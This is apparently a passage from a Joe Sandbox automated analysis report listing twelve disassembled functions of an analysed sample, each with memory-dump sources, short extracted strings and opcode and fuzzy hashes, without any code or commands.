                                      • Opcode ID: 790433102de95b3ab19d8b103d133afd28abe953374970c4900ec0084626a84d
                                      • Instruction ID: 3a460e5e978ad28bd04f46c27d95aef0aa55277bd2511da4cc55ba9333f316fa
                                      • Opcode Fuzzy Hash: 790433102de95b3ab19d8b103d133afd28abe953374970c4900ec0084626a84d
                                      • Instruction Fuzzy Hash: 1DB2E6F3A0C2149FE304AE2DEC8567AFBE5EF94720F164A3DEAC4C3744E63558058696
                                      Function 00F9C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ){+}$4cde$CJ$F'k)$GS
                                      • API String ID: 0-4192230409
                                      • Opcode ID: 1a5a22b20a1543fc16bb760e03567d1e1f8c47d943e6fc91cdb7824884bef4eb
                                      • Instruction ID: 3d7b7ad76b6d68fb9e22f18adbeee57ade0d5de223357736afe0b2768f47cfa3
                                      • Opcode Fuzzy Hash: 1a5a22b20a1543fc16bb760e03567d1e1f8c47d943e6fc91cdb7824884bef4eb
                                      • Instruction Fuzzy Hash: 43B12AB84053058FE354DF628688FAA7BB1FB25310F1A82E9E0892F736D7748405CF96
                                      Function 0100D387 Relevance: 5.6, Strings: 4, Instructions: 568COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8@<$V{[m$aRw}$o%_}
                                      • API String ID: 0-2063914474
                                      • Opcode ID: d2ed7b8333b0060ca16ff3c88519222e91348eb25e44d9bd9ae468ec027fedb5
                                      • Instruction ID: 705639f127a2d9059f6fc0527a583c5ea4ef061dd211800554b8efbd3a5d9404
                                      • Opcode Fuzzy Hash: d2ed7b8333b0060ca16ff3c88519222e91348eb25e44d9bd9ae468ec027fedb5
                                      • Instruction Fuzzy Hash: D302EFF3F102244BF3588929DC99366B6D2EBD4320F2B853D9E89A77C5E97E5C064384
                                      Function 00FB80B0 Relevance: 5.4, Strings: 4, Instructions: 440COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: '|$-.$12$i>}0
                                      • API String ID: 0-2215797287
                                      • Opcode ID: 8698b6068d1b8d7e23086ad86ebdee4a4e51f90eef5325d93505a952e2f9d3f0
                                      • Instruction ID: 9519ad7b3375b2dd333e82893b5b998d294154e605038a0be22400aaa27cc1f3
                                      • Opcode Fuzzy Hash: 8698b6068d1b8d7e23086ad86ebdee4a4e51f90eef5325d93505a952e2f9d3f0
                                      • Instruction Fuzzy Hash: 13D1FC7260C3158FD728CF29D89169FB7E2EFC1314F05892DE4D68B281EB74950ADB92
                                      Function 00FC533A Relevance: 5.4, Strings: 4, Instructions: 405COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `$a$b$c
                                      • API String ID: 0-1877310501
                                      • Opcode ID: aec4a90d22de55337293485d38793082de6222dcd9263781d138ff5f784f7962
                                      • Instruction ID: 8f2c1f92c09a10ad92d6a3e59f102b47d64f4a5dbf27b9bbd7ca4a4e9ede7796
                                      • Opcode Fuzzy Hash: aec4a90d22de55337293485d38793082de6222dcd9263781d138ff5f784f7962
                                      • Instruction Fuzzy Hash: 8C128E21908FD3DED326C63C8848745BF912B67328F0C8398D4E55BBD2C3A9A565D7E2
                                      Function 00FB6170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: 4zVc$8zVc$YNMZ$cba`
                                      • API String ID: 2994545307-1799417857
                                      • Opcode ID: b3099c3d7c0a1b9dd345c60ed07a4245596cca6f14f4572a21f30f4f925c8dfd
                                      • Instruction ID: 3261ca330f5819904b48cb880af81f676d629b91219911d44fe282a94eedf34f
                                      • Opcode Fuzzy Hash: b3099c3d7c0a1b9dd345c60ed07a4245596cca6f14f4572a21f30f4f925c8dfd
                                      • Instruction Fuzzy Hash: D59149B2E093109BD724DE66DC8276B72D6EBD1324F1D853CE985C7351E67C9C009B91
                                      Function 00FA92BA Relevance: 4.0, Strings: 3, Instructions: 300COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B? !$Z7]9$t3]5
                                      • API String ID: 0-3999537062
                                      • Opcode ID: d202f2f5075b21da65cc482885b2297edd0eaa4534ca816ccadd33ba7b4cd3f7
                                      • Instruction ID: 019f0b9f37151670e929ef86fc52fec287b55092d0bb6f314431ad1cd0cf33b2
                                      • Opcode Fuzzy Hash: d202f2f5075b21da65cc482885b2297edd0eaa4534ca816ccadd33ba7b4cd3f7
                                      • Instruction Fuzzy Hash: FF81DEB1A047128FC721CF29C491663F7F2FFAA760B1AC669C4860F765E375A842D790
                                      Function 00FCA3F0 Relevance: 3.2, Strings: 2, Instructions: 711COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: cba`$f
                                      • API String ID: 2994545307-1109690103
                                      • Opcode ID: 5ac8243af9082dcd697d37f9f0141fc29f12463f209aa388e9d2e3e290ec48b1
                                      • Instruction ID: edb69b3e73acc0953fb0aeb5a4b901b743d934ba4ed1347aac943df6887c2e43
                                      • Opcode Fuzzy Hash: 5ac8243af9082dcd697d37f9f0141fc29f12463f209aa388e9d2e3e290ec48b1
                                      • Instruction Fuzzy Hash: 95222871A0D3469FD314CF28C982B2EBBE2ABC4318F19852CE49587391D771E905DB53
                                      Function 00FB2270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: TU$c!"
                                      • API String ID: 0-3813282519
                                      • Opcode ID: 3aae10d3228763531c26872cfea8dcb73eb85164c2ba022dcfe6cd4fc284ade7
                                      • Instruction ID: f9c5df2249fe04b4ec0b2024f28a3881f382c3366ff1790ec15d73885c56ccaf
                                      • Opcode Fuzzy Hash: 3aae10d3228763531c26872cfea8dcb73eb85164c2ba022dcfe6cd4fc284ade7
                                      • Instruction Fuzzy Hash: EEC11672A043008BD754DF2ACC927BBB3E6EFD5324F19852CE596C7281E638D9059B52
                                      Function 00F94270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )$IEND
                                      • API String ID: 0-707183367
                                      • Opcode ID: c27184106dc6c0b39d9b6ed710df804c5e7b207b0dffc5dd5b9903c5076e8d76
                                      • Instruction ID: 13b179256a519efd2de2043d5ed9e081e678001e81b94c4c6fa4a49a58664675
                                      • Opcode Fuzzy Hash: c27184106dc6c0b39d9b6ed710df804c5e7b207b0dffc5dd5b9903c5076e8d76
                                      • Instruction Fuzzy Hash: B1D1E2B1908344AFEB20CF24DC41B5FBBE4ABA5304F14492DF9989B381D775E909DB92
                                      Function 00F99070 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &$(-$(,"-
                                      • API String ID: 0-2940422652
                                      • Opcode ID: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                      • Instruction ID: b171f53825ebb7e60d8ed0b43cb18e21eb6d740de5c445716002867c7870b5db
                                      • Opcode Fuzzy Hash: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                      • Instruction Fuzzy Hash: BD71562110C3828EDB15CF29849077BFFE1AFE2314F1945AEE4D59B282D7758A0AD762
                                      Function 00FAD074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pr$|~
                                      • API String ID: 0-4145297803
                                      • Opcode ID: 0cfa208b7eba7a8f77a0294de89205f3b3916e0c0c7db0b8cb541fe1d6625c05
                                      • Instruction ID: 681e0408191df1d057d8ab853229857daa6c2ba596ded0c7a1884831567e934a
                                      • Opcode Fuzzy Hash: 0cfa208b7eba7a8f77a0294de89205f3b3916e0c0c7db0b8cb541fe1d6625c05
                                      • Instruction Fuzzy Hash: 385136B060D3508BD7008F20C81276BB7F2EF92314F18856DE4C59B361E739DA02EB5A
                                      Function 00FAD087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pr$|~
                                      • API String ID: 0-4145297803
                                      • Opcode ID: 721b8e79e2f3cb865ccb93ebcb48200898cd85c30fb699a2001c69f03c393e1f
                                      • Instruction ID: ebcdaa571502b1523cbba4544a3b4f0810f1e1e7537237ea53d1cf5c2635bccb
                                      • Opcode Fuzzy Hash: 721b8e79e2f3cb865ccb93ebcb48200898cd85c30fb699a2001c69f03c393e1f
                                      • Instruction Fuzzy Hash: 815105B060D3508BD7049F24C81276BB7F2EF92314F18856DE4C55B365E73ADA02EB5A
                                      Function 00FB536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: BLJB$X
                                      • API String ID: 0-2222927247
                                      • Opcode ID: f615618d4bb730150ee9b47165d4a6dee4d57813abd1841ac69e7d09a82ba305
                                      • Instruction ID: 5b03bc57be11cac7bcf8ec055688ac73a61142ee5fb372e1149b4cb830165de9
                                      • Opcode Fuzzy Hash: f615618d4bb730150ee9b47165d4a6dee4d57813abd1841ac69e7d09a82ba305
